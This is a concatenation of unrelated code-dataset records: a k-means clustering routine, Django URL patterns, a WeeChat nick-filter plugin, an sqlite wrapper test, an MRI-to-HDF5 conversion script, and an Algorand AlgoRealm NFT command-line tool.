centers.append((cluster_list[item[1]].horiz_center(),\r\n                        cluster_list[item[1]].vert_center()))\r\n\r\n    final_clusters = []\r\n    #for itr in range(num_iterations):\r\n    while num_iterations > 0:\r\n        # initialize empty clusters\r\n        clusters = [Cluster(set(), j[0], j[1], 0, 0) for j in centers]\r\n        copy_clusters = [item.copy() for item in clusters]\r\n\r\n        # find distance of clusters from newly created clusters\r\n        for clus1 in cluster_list:\r\n            dmin = (float('inf'), None)\r\n            for idx, clus2 in enumerate(clusters):\r\n                dist = clus1.distance(clus2)\r\n                dmin = dmin if dmin[0] < dist else (dist, idx)\r\n            # merge the cluster to its closest pair\r\n            copy_clusters[dmin[1]].merge_clusters(clus1)\r\n\r\n        # update the centers of the desired clusters\r\n        centers = 
[]\r\n        for item in copy_clusters:\r\n            centers.append((item.horiz_center(), item.vert_center()))\r\n        final_clusters = list(copy_clusters)\r\n        num_iterations -= 1\r\n\r\n    return final_clusters\r\n","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":8024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
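The docstrings in cluster.py describe the interfaces, but the record never exercises them. The driver below is a hypothetical sketch: the Cluster constructor signature (fips_codes, horiz_center, vert_center, population, risk) is inferred from the Cluster(set(), j[0], j[1], 0, 0) call in kmeans_clustering, since alg_cluster itself is not part of this record.

from alg_cluster import Cluster
from cluster import fast_closest_pair, hierarchical_clustering, kmeans_clustering

# Five point clusters; (5.0, 4.0) and (5.2, 4.1) form the closest pair.
points = [(0.0, 0.0), (1.0, 0.0), (5.0, 4.0), (5.2, 4.1), (9.0, 9.0)]
clusters = [Cluster(set([str(i)]), x, y, 100, 0.5)
            for i, (x, y) in enumerate(points)]

print(fast_closest_pair(clusters))                        # (distance, 2, 3)

# hierarchical_clustering mutates its input, so hand it a copy.
print(len(hierarchical_clustering(list(clusters), 2)))    # 2
print(len(kmeans_clustering(clusters, 2, 5)))             # 2, after 5 refinement passes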
{"seq_id":"214951647","text":"from django.conf.urls.defaults import *\nfrom django.views.generic.simple import direct_to_template\n\n\n\nurlpatterns = patterns(\"\",\n    #url(r\"^$\", direct_to_template, {\"template\": \"broadcast/familypage.html\"}, name=\"broadcast\"),\n    url(r\"^familypage/$\", direct_to_template, {\"template\": \"broadcast/familypage.html\"}, name=\"familypage\"),\n    url(r\"^view_status/$\", \"broadcast.views.view_patient_status\", name=\"view_status\"),\n    url(r\"^form_kinship/$\", \"broadcast.views.form_kinship\", name=\"form_kinship\"),\n    url(r\"^find_patient/$\", \"broadcast.views.show_all_patients\", name=\"find_patient\"),\n)","sub_path":"apps/broadcast/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"333089259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport weechat as w\n\nw.register(\"show-only\",\"\",\"\",\"\",\"Shows messages only from one nick in current buffer\",\"\",\"\")\n\nfilters = []\n\ndef show_only(data, buffer, args):\n    if not args:\n        return show_all(data, buffer, args)\n    nick = args\n    filters.append(nick)\n    bname = w.buffer_get_string(buffer, \"full_name\")\n    command = \"/filter add \" + nick + \" \" + bname + \" * \" + \"!\"+nick+\"\\\\t\"\n    w.prnt(\"\",command)\n    w.command(\"\",command)\n    return w.WEECHAT_RC_OK\n\ndef show_all(data, buffer, args):\n    if not filters:\n        return w.WEECHAT_RC_OK\n    nick = filters.pop()\n    bname = w.buffer_get_string(buffer, \"full_name\")\n    command = \"/filter del \" + nick\n    w.prnt(\"\",command)\n    w.command(\"\",command)\n    return w.WEECHAT_RC_OK\n\nw.hook_command(\"show_only\",\"\",\"\",\"\",\"\",\"show_only\", \"\")\nw.hook_command(\"show_all\",\"\",\"\",\"\",\"\",\"show_all\", \"\")\n","sub_path":"python/show_only.py","file_name":"show_only.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"14428527","text":"import base\n\nclass TestBasicConnection(base.Base):\n    '''Test basic functionality about connection \n    \n    In all the tests, *_w refers to sqlite3_wrapper stuff, and *_s refers to\n    sqlite3 module stuff'''\n\n    def setUp(self):\n        self._sql = '/*mycomment*/select * from recipe order by name'\n        super(TestBasicConnection, self).setUp()\n\n    def test_execute(self):\n        con_w, con_s = self._get_cons()\n        cur_w = con_w.execute(self._sql)\n        cur_s = con_s.execute(self._sql)\n        data = [row for row in cur_w]\n        [self.assertTrue(dict(row) in data) for row in cur_s]\n        self._close_cursors(cur_w, cur_s)\n\n    def test_executemany(self):\n        con_w, con_s = self._get_cons()\n        cur_w = con_w.executemany(self._sql, [])\n        cur_s = con_s.executemany(self._sql, [])\n        data = [row for row in cur_w]\n        [self.assertTrue(dict(row) in data) for row in cur_s]\n        self._close_cursors(cur_w, cur_s)\n","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"70174492","text":"# hdf5_data_multichannel.py\n# --- details --- (option)\n# create hdf5 data multichannel with coregistration (w prefix) for training\n\n# --- version ---- (option)\n# sample_path\n# label_path\n# hdf5_path\n# sample_ext\n# label_ext\n# --- Input ---\n\n# --- output ----\n\n# --- ref ---\n\n# --- note ---(option)\n\n# by Lance Liu\n\n\nimport h5py\nimport os\nimport nibabel as nib\nimport numpy as np\nimport glob\nfrom matplotlib import pyplot as plt\n\n# n_sample = 35\nn_sample = (25, 35)\n# sample_path = '../IXI_preprocessed_387/imgs/'\nsample_path = ['../IXI_train_val_124/',\n               '../IXI_T2_train_val_124/',\n               '../IXI_PD_train_val_124/']\nlabel_path = '../IXI_train_val_label_124/'\nhdf5_path = 'resources/train_val_t1t2pd_hdf5'\nsample_ext = '.nii'\nlabel_ext = '.skull.label.nii'\n\nsamplelist = []\nfor sample_path_single in sample_path:\n    samplepathlist = glob.glob(sample_path_single+'w*'+sample_ext)\n    samplelist.append([i.split('/')[-1] for i in samplepathlist])\n\nlabelpathlist = glob.glob(label_path+'w*'+label_ext)\nlabellist = [i.split('/')[-1] for i in labelpathlist]\n\n# for i in range(n_sample):\nfor i in range(*n_sample):\n\n    # assert samplelist[0][i][:-10] == samplelist[1][i][:-10] == samplelist[2][i][:-10], \\\n    #     \"only processed \"+str(i)+\" samples, error occurs: \" + \\\n    #     samplelist[0][i]+\" does not exist in all modalities\"\n\n    sample_name = labellist[i].split('.')[0]\n    volume = []\n    for jj in range(len(sample_path)):\n        sample_fullpath = os.path.join(sample_path[jj], samplelist[jj][i])\n        sample = nib.load(sample_fullpath)\n        # volume1 = np.swapaxes(sample.get_fdata(), 0, 2)\n        # volume1 = np.fliplr(np.swapaxes(volume1, 1, 2))\n        # volume.append(volume1)\n        sample = sample.get_fdata()\n        volume.append(sample)\n    volume = np.stack(volume)\n\n    label_name_ext = labellist[i]\n    label_fullpath = os.path.join(label_path, label_name_ext)\n    label = nib.load(label_fullpath)\n    label = label.get_fdata()\n    # remap the four skull label values to 1..4\n    label[label == 16] = 1\n    label[label == 17] = 2\n    label[label == 18] = 3\n    label[label == 19] = 4\n\n    volume = volume.astype(np.float32)\n    label = label.astype(np.int32)\n    # debug views, left disabled for batch runs:\n    # plt.imshow(volume[1, :, :, 80])\n    # plt.imshow(label[:, :, 80])\n\n    save_path = os.path.join(hdf5_path, sample_name+'.h5')\n\n    hf = h5py.File(save_path, 'w')\n    hf.create_dataset('raw', data=volume, chunks=True, compression='gzip')\n    hf.create_dataset('label', data=label, chunks=True, compression='gzip')\n    hf.close()\n","sub_path":"hdf5_dataset_multichannel_T2_DTI.py","file_name":"hdf5_dataset_multichannel_T2_DTI.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"622307324","text":"\"\"\"\nAlgoRealm, only generous heart will ever rule over Algorand. 
(by cusma)\n\nUsage:\n algorealm.py poem\n algorealm.py dynasty \n algorealm.py claim-crown \n algorealm.py claim-sceptre \n algorealm.py claim-card \n algorealm.py buy-order [--msg]\n algorealm.py verify-order \n algorealm.py sell-card \n algorealm.py [--help]\n\nCommands:\n poem AlgoRealm's poem.\n dynasty Print the glorious dynasty of AlgoRealm's Majesties.\n claim-crown Claim the Crown of Entropy, become the Randomic Majesty of Algorand.\n claim-sceptre Claim the Sceptre of Proof, become the Verifiable Majesty of Algorand.\n claim-card Brake the spell and claim the AlgoRealm Card by AlgoWorld.\n buy-order Place an order for the AlgoRealm Card.\n review-order Review the partially signed buy order.\n sell-card Sell the AlgoRealm Card (paying a 10% royalty).\n\nOptions:\n -m --msg Notify the Seller about your buy order on-chain.\n -h --help\n\"\"\"\n\nimport math\nimport sys\nimport time\nimport base64\nimport msgpack\nimport traceback\nimport dataclasses\n\nfrom docopt import docopt\n\nfrom algosdk.v2client import algod, indexer\nfrom algosdk.error import AlgodHTTPError, IndexerHTTPError\nfrom algosdk.future import transaction\nfrom algosdk import mnemonic, account, util\n\n\n@dataclasses.dataclass\nclass Account:\n address: str\n private_key: str\n lsig: transaction.LogicSig = None\n\n def mnemonic(self) -> str:\n return mnemonic.from_private_key(self.private_key)\n\n def is_lsig(self):\n return not self.private_key and self.lsig\n\n @classmethod\n def create_account(cls):\n private_key, address = account.generate_account()\n return cls(private_key=private_key, address=address)\n\n\n# --- Config\nMAX_CONNECTION_ATTEMPTS = 10\nCONNECTION_ATTEMPT_DELAY_SEC = 2\n\nINDEXER_ADDRESS = \"https://mainnet-algorand.api.purestake.io/idx2\"\nALGOD_ADDRESS = \"https://mainnet-algorand.api.purestake.io/ps2\"\n\nREWARDS_POOL = '737777777777777777777777777777777777777777777777777UFEJ2CI'\n\nALGOREALM_FIRST_BLOCK = 13578170\nALGOREALM_APP_ID = 137491307\nCROWN_ID = 137493252\nSCEPTRE_ID = 137494385\n\nALGOREALM_LAW_BYTECODE = \\\n 'AiAIAwbr5sdBAQSE9sdB8f7HQegHJgEg/v////////////////////////////////////' \\\n '////8yBCISMwAQIxIzABgkEhAQMwEQJRIzAQAzAAASEDMBBygSEBAzAhAhBBIzAhQzAQAS' \\\n 'EDMCESEFEjMCESEGEhEQMwISJRIQMwIBIQcOEDMCFTIDEhAzAiAyAxIQEA=='\n\nALGOREALM_LAW_LSIG = transaction.LogicSig(\n base64.decodebytes(ALGOREALM_LAW_BYTECODE.encode())\n)\n\nALGOREALM_LAW = Account(\n address=ALGOREALM_LAW_LSIG.address(),\n private_key=None,\n lsig=ALGOREALM_LAW_LSIG,\n)\n\nALGOREALM_CARD_FIRST_BLOCK = 16250000\nROYALTY_PERC = 5\nROYALTY_COLLECTOR_1 = Account(\n address='H7N65NZIWBOKFDSRNPLLDGN72HVFKXT4RRSY7M66B6Y2PFLQFKLPLHU5JU',\n private_key=''\n)\nROYALTY_COLLECTOR_2 = Account(\n address='2PDM3E7WLVPMEKCCMNTHM3FCZNZM4CSJQUOC4SWHMFPAR3N4NXBLCQKHPE',\n private_key=''\n)\nASA_STATE_OBSERVER_APP_ID = 321230622\nCARD_ID = 321172366\nCARD_CONTRACT_BYTECODE = \\\n 'AyAOAQMGBOgHnq6WmQGE9sdB8f7HQQVkjueSmQGQ6d8HAM7i0wcmAwtBc2FBbW91bnRFcS' \\\n 'A/2+63KLBcoo5Ra9axmb/R6lVefIxlj7PeD7GnlXAqliDTxs2T9l1ewihCY2Z2bKLLcs4K' \\\n 'SYUcLkrHYV4I7bxtwjIEIhJAAaIyBCMSQAD4MgQkEkAAAQAzABAkEjMBECQSEDMCECISED' \\\n 'MDECISEDMEECISEDMFECUSEDMFASEEDhAzBSAyAxIQMwUVMgMSEDMAGCEFEjcAGgAoEhA3' \\\n 'ABwBMwAAEhA3ADAAIQYSEDcAGgEiFhIQEDMBGCEFEjcBGgAoEhA3ARwBMwEAEhA3ATAAIQ' \\\n 'cSEDcBGgEiFhIQEDMAADMCBxIQMwEAMwIHEhAzAgAzBRQSEDMDADMCBxIQMwMHKRIQMwQA' \\\n 'MwIHEhAzBAcqEhAzAwgzBAgSEDMDCDMCCCEICyEJCg8QMwURIQoSEDMFEiISEDMFEzMCBx' \\\n 'IQMwUUMwIAEhBCANczABAkEjMBECQSEDMCECUSEDMCASEEDhAzAiAyAxIQMwIVMgMSEDMA' \\\n 
'GCEFEjcAGgAoEhA3ABwBMwAAEhA3ADAAIQYSEDcAGgEiFhIQEDMBGCEFEjcBGgAoEhA3AR' \\\n 'wBMwEAEhA3ATAAIQcSEDcBGgEiFhIQEDMAADMCFBIQMwEAMwIUEhAzAgIhCw0QMwIRIQoS' \\\n 'EDMCEiISEDMCADMCExIQQgA0MRAlEjEBIQQOEDETMgMSEDEVMgMSEDEgMgMSEDERIQoSED' \\\n 'ESIQwSEDEAMRQSEDEEIQ0MEA=='\n\nCARD_CONTRACT_LSIG = transaction.LogicSig(\n base64.decodebytes(CARD_CONTRACT_BYTECODE.encode())\n)\n\nCARD_CONTRACT = Account(\n address=CARD_CONTRACT_LSIG.address(),\n private_key=None,\n lsig=CARD_CONTRACT_LSIG,\n)\n\n\ndef wait_for_confirmation(client: algod.AlgodClient, txid: str):\n \"\"\"\n Utility function to wait until the transaction is confirmed before\n proceeding.\n \"\"\"\n last_round = client.status().get(\"last-round\")\n txinfo = client.pending_transaction_info(txid)\n\n while not txinfo.get(\"confirmed-round\", -1) > 0:\n print(f\"Waiting for transaction {txid} confirmation.\")\n last_round += 1\n client.status_after_block(last_round)\n txinfo = client.pending_transaction_info(txid)\n\n print(\n f\"Transaction {txid} confirmed in round {txinfo.get('confirmed-round')}.\")\n return txinfo\n\n\ndef sign(account: Account, txn: transaction.Transaction):\n if account.is_lsig():\n return transaction.LogicSigTransaction(txn, account.lsig)\n else:\n assert account.private_key\n return txn.sign(account.private_key)\n\n\ndef sign_send_wait(\n algod_client: algod.AlgodClient,\n account: Account,\n txn):\n \"\"\"Sign a transaction, submit it, and wait for its confirmation.\"\"\"\n signed_txn = sign(account, txn)\n tx_id = signed_txn.transaction.get_txid()\n algod_client.send_transactions([signed_txn])\n wait_for_confirmation(algod_client, tx_id)\n return algod_client.pending_transaction_info(tx_id)\n\n\ndef group_and_sign(signers, txns):\n assert len(signers) == len(txns)\n\n signed_group = []\n gid = transaction.calculate_group_id(txns)\n\n for signer, t in zip(signers, txns):\n t.group = gid\n signed_group.append(sign(signer, t))\n\n return signed_group\n\n\ndef search_algorelm_calls(indexer_client: indexer.IndexerClient):\n nexttoken = \"\"\n numtx = 1\n calls = []\n while numtx > 0:\n result = indexer_client.search_transactions(\n limit=1000,\n next_page=nexttoken,\n application_id=ALGOREALM_APP_ID,\n min_round=ALGOREALM_FIRST_BLOCK,\n )\n calls += result['transactions']\n numtx = len(result['transactions'])\n if numtx > 0:\n # pointer to the next chunk of requests\n nexttoken = result['next-token']\n return calls\n\n\ndef search_algorelm_nft_txns(\n indexer_client: indexer.IndexerClient,\n nft_id: int\n):\n nexttoken = \"\"\n numtx = 1\n txns = []\n while numtx > 0:\n result = indexer_client.search_asset_transactions(\n asset_id=nft_id,\n limit=1000,\n next_page=nexttoken,\n txn_type='axfer',\n min_round=ALGOREALM_FIRST_BLOCK,\n )\n txns += result['transactions']\n numtx = len(result['transactions'])\n if numtx > 0:\n # pointer to the next chunk of requests\n nexttoken = result['next-token']\n return txns\n\n\ndef history(indexer_client: indexer.IndexerClient):\n attempts = 1\n algorealm_calls = None\n while attempts <= MAX_CONNECTION_ATTEMPTS:\n try:\n algorealm_calls = search_algorelm_calls(indexer_client)\n break\n except IndexerHTTPError:\n print(f'Indexer Client connection attempt '\n f'{attempts}/{MAX_CONNECTION_ATTEMPTS}')\n print('Trying to contact Indexer Client again...')\n time.sleep(CONNECTION_ATTEMPT_DELAY_SEC)\n finally:\n attempts += 1\n if not algorealm_calls:\n quit(\"❌ Unable to connect to Indexer Client. 
Check your API token!\")\n\n claims_history = []\n name = ''\n claim = ''\n for call in algorealm_calls:\n call_args = call['application-transaction']['application-args']\n # Check is an NFT claim call\n if len(call_args) == 2:\n block = call['confirmed-round']\n nft = call_args[0].encode()\n donation = call['global-state-delta'][0]['value']['uint']\n # Check is a different claimer (2 elements in the state delta)\n if len(call['global-state-delta']) == 2:\n name = base64.b64decode(\n call['global-state-delta'][1]['value']['bytes']).decode()\n if nft == base64.b64encode(b\"Crown\"):\n claim = f\"👑 {name} claimed the Crown of Entropy\\n\" \\\n f\"on Block: {block} donating: {donation} microALGOs \" \\\n f\"to the Rewards Pool.\\n\\n\"\n elif nft == base64.b64encode(b\"Sceptre\"):\n claim = f\"🪄 {name} claimed the Sceptre of Proof\\n\" \\\n f\"on Block: {block} donating: {donation} microALGOs \" \\\n f\"to the Rewards Pool.\\n\\n\"\n else:\n pass\n\n claims_history += [claim]\n\n else:\n pass\n\n return claims_history\n\n\ndef current_owner(indexer_client: indexer.IndexerClient, nft_id: int):\n attempts = 1\n nft_txns = None\n while attempts <= MAX_CONNECTION_ATTEMPTS:\n try:\n nft_txns = search_algorelm_nft_txns(indexer_client, nft_id)\n break\n except IndexerHTTPError:\n print(f'Indexer Client connection attempt '\n f'{attempts}/{MAX_CONNECTION_ATTEMPTS}')\n print('Trying to contact Indexer Client again...')\n time.sleep(CONNECTION_ATTEMPT_DELAY_SEC)\n finally:\n attempts += 1\n if not nft_txns:\n quit(\"❌ Unable to connect to Indexer Client. Check your API token!\")\n\n nft_txns.reverse()\n for txn in nft_txns:\n if txn['asset-transfer-transaction']['amount'] == 1:\n return txn['asset-transfer-transaction']['receiver']\n\n\ndef opt_in(\n algod_client: algod.AlgodClient,\n user: Account,\n nft_id: int,\n):\n nft_name = algod_client.asset_info(nft_id)['params']['name']\n optin = ''\n while not optin:\n optin = str(input(\n f\"Do you want to opt-in the {nft_name} (ID: {nft_id})? (Y/n) \"\n ))\n print(\"\")\n if optin.lower() == 'y':\n params = algod_client.suggested_params()\n\n opt_in_txn = transaction.AssetOptInTxn(\n sender=user.address,\n sp=params,\n index=nft_id,\n )\n return sign_send_wait(algod_client, user, opt_in_txn)\n\n elif optin.lower() == 'n':\n return\n else:\n optin = ''\n\n\ndef claim_nft(\n algod_client: algod.AlgodClient,\n indexer_client: indexer.IndexerClient,\n claimer: Account,\n claim_arg: str,\n new_majesty: str,\n donation_amount: int,\n nft_id: int,\n):\n params = algod_client.suggested_params()\n\n claim_txn = transaction.ApplicationNoOpTxn(\n sender=claimer.address,\n sp=params,\n index=ALGOREALM_APP_ID,\n app_args=[claim_arg.encode(), new_majesty.encode()]\n )\n\n donation_txn = transaction.PaymentTxn(\n sender=claimer.address,\n sp=params,\n receiver=REWARDS_POOL,\n amt=donation_amount,\n )\n\n nft_transfer = transaction.AssetTransferTxn(\n sender=ALGOREALM_LAW.address,\n sp=params,\n receiver=claimer.address,\n amt=1,\n index=nft_id,\n revocation_target=current_owner(indexer_client, nft_id),\n )\n\n signed_group = group_and_sign(\n [claimer, claimer, ALGOREALM_LAW],\n [claim_txn, donation_txn, nft_transfer],\n )\n\n nft_name = algod_client.asset_info(nft_id)['params']['name']\n\n print(f\"Claiming the {nft_name} as {new_majesty}, \"\n f\"donating {donation_amount / 10 ** 6} ALGO...\\n\")\n try:\n gtxn_id = algod_client.send_transactions(signed_group)\n wait_for_confirmation(algod_client, gtxn_id)\n except AlgodHTTPError:\n quit(\"\\n☹️ Were you too stingy? 
Only generous hearts will rule over \"\n \"Algorand Realm!\\n️\")\n\n\ndef proof_asa_amount_eq_txn(\n algod_client: algod.AlgodClient,\n sender: Account,\n asa_id: int,\n asa_amount: int,\n):\n params = algod_client.suggested_params()\n\n proof_txn = transaction.ApplicationNoOpTxn(\n sender=sender.address,\n sp=params,\n index=ASA_STATE_OBSERVER_APP_ID,\n app_args=[\"AsaAmountEq\".encode(), asa_amount],\n foreign_assets=[asa_id],\n accounts=[sender.address],\n )\n return proof_txn\n\n\ndef claim_card(algod_client: algod.AlgodClient, claimer: Account):\n params = algod_client.suggested_params()\n\n proof_crown_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=claimer,\n asa_id=CROWN_ID,\n asa_amount=1,\n )\n\n proof_sceptre_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=claimer,\n asa_id=SCEPTRE_ID,\n asa_amount=1,\n )\n\n nft_card_xfer = transaction.AssetTransferTxn(\n sender=CARD_CONTRACT.address,\n sp=params,\n receiver=claimer.address,\n amt=1,\n index=CARD_ID,\n revocation_target=CARD_CONTRACT.address,\n )\n\n signed_group = group_and_sign(\n [claimer, claimer, CARD_CONTRACT],\n [proof_crown_ownership, proof_sceptre_ownership, nft_card_xfer],\n )\n\n try:\n gtxn_id = algod_client.send_transactions(signed_group)\n wait_for_confirmation(algod_client, gtxn_id)\n except AlgodHTTPError:\n quit(\"\\nOnly the generous heart of the Great Majesty of Algorand \"\n \"can break the spell!\\n\"\n \"Conquer both the 👑 Crown of Entropy and the 🪄 Sceptre \"\n \"of Proof first!\\n\")\n\n\ndef card_order(\n algod_client: algod.AlgodClient,\n buyer: Account,\n seller: Account,\n price: int,\n):\n params = algod_client.suggested_params()\n\n proof_crown_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=seller,\n asa_id=CROWN_ID,\n asa_amount=1,\n )\n\n proof_sceptre_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=seller,\n asa_id=SCEPTRE_ID,\n asa_amount=1,\n )\n\n nft_card_payment = transaction.PaymentTxn(\n sender=buyer.address,\n sp=params,\n receiver=seller.address,\n amt=price,\n )\n\n royalty_amount = math.ceil(price * ROYALTY_PERC / 100)\n\n royalty_1_payment = transaction.PaymentTxn(\n sender=seller.address,\n sp=params,\n receiver=ROYALTY_COLLECTOR_1.address,\n amt=royalty_amount,\n )\n\n royalty_2_payment = transaction.PaymentTxn(\n sender=seller.address,\n sp=params,\n receiver=ROYALTY_COLLECTOR_2.address,\n amt=royalty_amount,\n )\n\n nft_card_xfer = transaction.AssetTransferTxn(\n sender=CARD_CONTRACT.address,\n sp=params,\n receiver=buyer.address,\n amt=1,\n index=CARD_ID,\n revocation_target=seller.address,\n )\n\n trade_gtxn = [\n proof_crown_ownership,\n proof_sceptre_ownership,\n nft_card_payment,\n royalty_1_payment,\n royalty_2_payment,\n nft_card_xfer\n ]\n\n transaction.assign_group_id(trade_gtxn)\n signed_nft_card_payment = trade_gtxn[2].sign(buyer.private_key)\n trade_gtxn[2] = signed_nft_card_payment\n trade_gtxn[5] = transaction.LogicSigTransaction(trade_gtxn[5],\n CARD_CONTRACT.lsig)\n transaction.write_to_file(trade_gtxn, 'trade_raw.gtxn', overwrite=True)\n\n print(\n \"📝 Partially signed trade group transaction saved as: 'trade.gtxn'\\n\")\n\n return trade_gtxn\n\n\ndef notify(\n algod_client: algod.AlgodClient,\n user: Account,\n seller: Account,\n trade_gtxn: list\n):\n params = algod_client.suggested_params()\n\n note = {\n 'buy_order': 'AlgoRealm Special Card',\n 'asset_id': CARD_ID,\n 'algo_amount': trade_gtxn[2].transaction.amt / 10 ** 6,\n 'algo_royalty': 
(trade_gtxn[3].amt + trade_gtxn[4].amt) / 10 ** 6,\n 'last_valid_block': trade_gtxn[2].transaction.last_valid_round\n }\n\n bytes_note = msgpack.packb(note)\n\n notification_txn = transaction.PaymentTxn(\n sender=user.address,\n sp=params,\n receiver=seller.address,\n amt=0,\n note=bytes_note,\n )\n\n signed_txn = sign(user, notification_txn)\n tx_id = signed_txn.transaction.get_txid()\n print(\"✉️ Sending buy order notification to the Seller...\\n\")\n algod_client.send_transactions([signed_txn])\n wait_for_confirmation(algod_client, tx_id)\n print(\"\\n📄 Buy order notification:\\n\"\n \"https://mainnet.algoexplorer.io/tx/\" + tx_id)\n\n\ndef verify_buy_order(seller_address: str):\n trade_gtxn = transaction.retrieve_from_file('trade_raw.gtxn')\n\n # Check TXN 0: Crown Proof of Ownership\n try:\n assert trade_gtxn[0].type == 'appl'\n assert trade_gtxn[0].index == ASA_STATE_OBSERVER_APP_ID\n assert trade_gtxn[0].app_args[0] == b'AsaAmountEq'\n assert trade_gtxn[0].app_args[1] == b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01'\n assert trade_gtxn[0].foreign_assets[0] == CROWN_ID\n assert trade_gtxn[0].accounts[0] == seller_address\n assert trade_gtxn[0].sender == seller_address\n assert trade_gtxn[0].fee <= 1000\n assert trade_gtxn[0].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 0 - Crown Proof of Ownership is invalid: {}\".format(\n text))\n\n # Check TXN 1: Sceptre Proof of Ownership\n try:\n assert trade_gtxn[1].type == 'appl'\n assert trade_gtxn[1].index == ASA_STATE_OBSERVER_APP_ID\n assert trade_gtxn[1].app_args[0] == b'AsaAmountEq'\n assert trade_gtxn[1].app_args[1] == b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01'\n assert trade_gtxn[1].foreign_assets[0] == SCEPTRE_ID\n assert trade_gtxn[1].accounts[0] == seller_address\n assert trade_gtxn[1].sender == seller_address\n assert trade_gtxn[1].fee <= 1000\n assert trade_gtxn[1].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\n \"Transaction 1 - Sceptre Proof of Ownership is invalid: {}\".format(\n text))\n\n # Check TXN 2: Card Payment\n try:\n assert trade_gtxn[2].transaction.type == 'pay'\n assert trade_gtxn[2].transaction.receiver == seller_address\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 2 - Card Payment is invalid: {}\".format(text))\n\n # Check TXN 3: Royalty 1 Payment\n try:\n assert trade_gtxn[3].type == 'pay'\n assert trade_gtxn[3].sender == seller_address\n assert trade_gtxn[3].receiver == ROYALTY_COLLECTOR_1.address\n assert trade_gtxn[3].fee <= 1000\n assert trade_gtxn[3].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 3 - Royalty 1 Payment is invalid: {}\".format(text))\n\n # Check TXN 4: Royalty 3 Payment\n try:\n assert trade_gtxn[4].type == 'pay'\n assert trade_gtxn[4].sender == seller_address\n assert trade_gtxn[4].receiver == ROYALTY_COLLECTOR_2.address\n assert trade_gtxn[4].fee <= 1000\n assert trade_gtxn[4].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 4 - Royalty 2 Payment is invalid: {}\".format(text))\n\n # Check TXN 5: Card Transfer\n 
try:\n assert trade_gtxn[5].transaction.type == 'axfer'\n assert trade_gtxn[5].transaction.index == CARD_ID\n assert trade_gtxn[5].transaction.amount == 1\n assert trade_gtxn[5].transaction.sender == CARD_CONTRACT.address\n assert trade_gtxn[5].transaction.receiver == trade_gtxn[\n 2].transaction.sender\n assert trade_gtxn[5].transaction.revocation_target == seller_address\n assert trade_gtxn[5].transaction.fee <= 1000\n assert trade_gtxn[5].transaction.rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 5 - Card Transfer is invalid: {}\".format(text))\n\n return trade_gtxn\n\n\ndef order_summary(trade_gtxn: list):\n return f\"\"\"\n * =========================== ORDER SUMMARY =========================== *\n\n BUYER:\\t{trade_gtxn[2].transaction.sender}\n SELLER:\\t{trade_gtxn[2].transaction.receiver}\n AMOUNT:\\t{trade_gtxn[2].transaction.amt / 10 ** 6} ALGO\n ROYALTY:\\t{(trade_gtxn[3].amt + trade_gtxn[4].amt) / 10 ** 6} ALGO\n\n LAST VALID BLOCK: {trade_gtxn[2].transaction.last_valid_round}\n\n * ===================================================================== *\n \"\"\"\n\n\ndef sell_card(algod_client: algod.AlgodClient, user: Account):\n trade_gtxn = transaction.retrieve_from_file('trade_raw.gtxn')\n\n signed_crown_proof = trade_gtxn[0].sign(user.private_key)\n signed_sceptre_proof = trade_gtxn[1].sign(user.private_key)\n signed_royalty_1 = trade_gtxn[3].sign(user.private_key)\n signed_royalty_2 = trade_gtxn[4].sign(user.private_key)\n\n trade_gtxn[0] = signed_crown_proof\n trade_gtxn[1] = signed_sceptre_proof\n trade_gtxn[3] = signed_royalty_1\n trade_gtxn[4] = signed_royalty_2\n\n print(f\"🤝 Selling the AlgoRealm Special Card for \"\n f\"{trade_gtxn[2].transaction.amt / 10 ** 6} ALGO:\\n\")\n try:\n gtxn_id = algod_client.send_transactions(trade_gtxn)\n except AlgodHTTPError:\n quit(\n \"You must hold the 👑 Crown and the 🪄 Scepter to sell the Card!\\n\")\n else:\n return wait_for_confirmation(algod_client, gtxn_id)\n\n\ndef title():\n return r\"\"\"\n __ __ ___ __ __ \n \\*) \\*) \\*/ (*/ (*/ \n \\*\\_\\*\\_|O|_/*/_/*/ \n \\_______________/ \n _ __ _______ __ \n / \\ [ | |_ __ \\ [ | \n / _ \\ | | .--./) .--. | |__) | .---. ,--. | | _ .--..--. \n / ___ \\ | | / /'`\\;/ .'`\\ \\ | __ / / /__\\\\`'_\\ : | | [ `.-. .-. | \n _/ / \\ \\_ | | \\ \\._//| \\__. |_| | \\ \\_| \\__.,// | |, | | | | | | | | \n |____| |____|[___].',__` '.__.'|____| 